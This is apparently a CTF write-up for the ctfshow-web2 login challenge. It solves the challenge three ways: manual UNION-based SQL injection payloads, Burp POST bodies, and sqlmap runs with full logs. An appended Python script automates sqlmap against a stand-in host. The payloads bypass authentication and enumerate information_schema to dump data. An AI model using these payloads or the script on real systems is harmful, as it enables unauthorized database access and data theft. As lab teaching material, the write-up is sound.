Three injection approaches for one challenge
ctfshow-web2
Hint: the simplest SQL injection
Manual injection
Log in with the universal password 1' or 1=1# and the login succeeds: the quote closes the username string, or 1=1 makes the WHERE clause true for every row, and # comments out the rest of the original statement, including the password check.
Determine the number of columns with a UNION probe: union select 1,2,3 produces output, while union select 1,2,3,4 produces none (both sides of a UNION must return the same number of columns), so the query has 3 columns. The probe also shows which position is echoed back to the page, which is why every payload below puts its output in the second column.
1' or 1=1 union select 1,2,3 #
Dump the database name; the current database is web2
1' or 1=1 union select 1,database(),3 #
Dump the table names; there is a table named flag
1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2' #
Query the columns of the flag table
1' or 1=1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name='flag'#
Query the data in the flag column
1' or 1=1 union select 1,flag,3 from flag#
Injection with Burp Suite
Log in with the universal password; login succeeds. The payloads below are sent raw in the POST body, so # can stay as-is; it only needs to be encoded as %23 when the payload travels in a URL query string.
username=1' or 1=1 #&password=123456
Determine the number of columns
username=1' or 1=1 union select 1,2,3 #&password=123456
Dump the database name
username=1' or 1=1 union select 1,database(),3 #&password=123456
Dump the table names
username=1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#&password=123456
Dump the column names
username=1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#&password=123456
Dump the values
username=1' or 1=1 union select 1,flag,3 from flag#&password=123456
Injection with sqlmap
sqlmap, POST type: let sqlmap do everything. Submit any username and password, capture the request with Burp,
copy the captured request into search-test.txt in the sqlmap directory, then open cmd in the sqlmap directory.
1. Load our POST request search-test.txt into sqlmap. sqlmap finds both username and password injectable and asks which one to continue with ([1] password was chosen here); a database named web2 shows up in the list.
python2 sqlmap.py -r search-test.txt --dbs
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.3.19#dev}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:47:29
[22:47:29] [INFO] parsing HTTP request from 'search-test.txt'
[22:47:29] [INFO] resuming back-end DBMS 'mysql'
[22:47:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin&password=123456' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','BvZCIvUYHwJiZOHrkjYfxaYXdlTUfAVLqSDhuFzN'),'qpbbq'),NULL-- biRX
Parameter: username (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(CONCAT('qvppq','kaxOiReLBCwlCfkOGznsgTQolxrbWCWvIIqDGLCc'),'qpbbq'),NULL-- yslB&password=123456
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[22:47:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:47:54] [INFO] fetching database names
available databases [6]:
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] web2
[22:47:54] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:47:54
2. List the tables
python2 sqlmap.py -r search-test.txt -D web2 --tables
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt -D web2 --tables
[*] starting at 22:51:30
[22:51:30] [INFO] parsing HTTP request from 'search-test.txt'
[22:51:30] [INFO] resuming back-end DBMS 'mysql'
[22:51:30] [INFO] testing connection to the target URL
[22:51:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:51:32] [INFO] fetching tables for database: 'web2'
Database: web2
[2 tables]
+------+
| user |
| flag |
+------+
[22:51:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:51:32
3. List the columns
python2 sqlmap.py -r search-test.txt -D web2 -T flag --columns
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt -D web2 -T flag --columns
[*] starting at 22:53:26
[22:53:26] [INFO] parsing HTTP request from 'search-test.txt'
[22:53:26] [INFO] resuming back-end DBMS 'mysql'
[22:53:26] [INFO] testing connection to the target URL
[22:53:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:53:28] [INFO] fetching columns for table 'flag' in database 'web2'
Database: web2
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(255) |
+--------+--------------+
[22:53:28] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:53:28
4. Dump the data
python2 sqlmap.py -r search-test.txt -D web2 -T flag -C flag --dump
D:\CTF\WEB\sqlmap>python2 sqlmap.py -r search-test.txt -D web2 -T flag -C flag --dump
[*] starting at 22:56:04
[22:56:04] [INFO] parsing HTTP request from 'search-test.txt'
[22:56:04] [INFO] resuming back-end DBMS 'mysql'
[22:56:04] [INFO] testing connection to the target URL
[22:56:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.3.11, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[22:56:06] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'web2'
[22:56:06] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[22:56:06] [INFO] the SQL query used returns 1 entries
[22:56:06] [INFO] resumed: flag{b6e4fe66-7e15-48ee-b97d-44f24442edf2}
[22:56:06] [INFO] analyzing table dump for possible password hashes
Database: web2
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{b6e4fe66-7e15-48ee-b97d-44f24442edf2} |
+--------------------------------------------+
[22:56:06] [INFO] table 'web2.flag' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show\dump\web2\flag.csv'
[22:56:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\3a1b884c-2be9-4c53-80d3-733dfd1dd0cf.chall.ctf.show'
[*] shutting down at 22:56:06
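The write-up says to copy the captured request into search-test.txt without showing what that file contains, and the log shows sqlmap stopping to ask which of two injection points to use on every run. As an added example, not code from the write-up or from sqlmap, the script below builds a raw request file in the form Burp displays it and assembles a non-interactive command line for the four steps above. The host and path are constructed stand-ins (use the ones from your own capture); the parameter names username and password, the names web2 / flag / flag, and the sqlmap options are from the write-up and sqlmap's documented command-line flags. It assumes a `sqlmap` executable on PATH rather than `python2 sqlmap.py`, and only runs it if one is found.

```python
# Added example: build the request file `sqlmap -r` reads and a non-interactive
# sqlmap command line for the four steps of the write-up.  Host/path below are
# constructed; `sqlmap` on PATH is an assumption (the write-up used python2 sqlmap.py).
import shutil
import subprocess
import tempfile
from pathlib import Path
from urllib.parse import urlencode


def build_raw_request(host, path, fields):
    """A minimal raw HTTP/1.1 POST as Burp shows it.  The body is form-encoded
    and Content-Length must match it, or sqlmap's replays of the request break."""
    body = urlencode(fields)
    head = "\r\n".join([
        "POST %s HTTP/1.1" % path,
        "Host: %s" % host,
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(body.encode("utf-8")),
    ])
    return head + "\r\n\r\n" + body


def write_request_file(path, raw_request):
    """Write the request byte-for-byte (CRLF kept) for `sqlmap -r`."""
    Path(path).write_bytes(raw_request.encode("utf-8"))
    return str(path)


def sqlmap_argv(request_file, step, db="web2", table="flag", column="flag",
                param="password"):
    """Command lines for the write-up's four steps, made non-interactive:
    --batch takes the default answer to every prompt, -p pins the injection
    point to one parameter (the log shows sqlmap finding two and asking), and
    --dbms / --technique U skip fingerprinting and the non-UNION tests this
    challenge does not need."""
    base = ["sqlmap", "-r", request_file, "--batch", "-p", param,
            "--dbms", "MySQL", "--technique", "U"]
    steps = {
        "dbs": ["--dbs"],
        "tables": ["-D", db, "--tables"],
        "columns": ["-D", db, "-T", table, "--columns"],
        "dump": ["-D", db, "-T", table, "-C", column, "--dump"],
    }
    return base + steps[step]


def run_if_available(argv):
    """Run sqlmap only when it is on PATH (and only against a target you are
    authorised to test); returns its stdout, or None when it is absent."""
    if shutil.which(argv[0]) is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed stand-ins: take the real host and path from your own capture.
    raw = build_raw_request("target.example", "/",
                            {"username": "admin", "password": "123456"})
    req = write_request_file(Path(tempfile.mkdtemp()) / "search-test.txt", raw)
    print(raw)
    for step in ("dbs", "tables", "columns", "dump"):
        argv = sqlmap_argv(req, step)
        print(" ".join(argv))
        out = run_if_available(argv)
        if out is not None:
            print(out)
```

If a previous run is cached, sqlmap prints "resuming back-end DBMS" and reuses the stored injection points as the log above shows; add --flush-session to the argv when you want it to re-test from scratch.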
Reference: sqlmap injection basic tutorial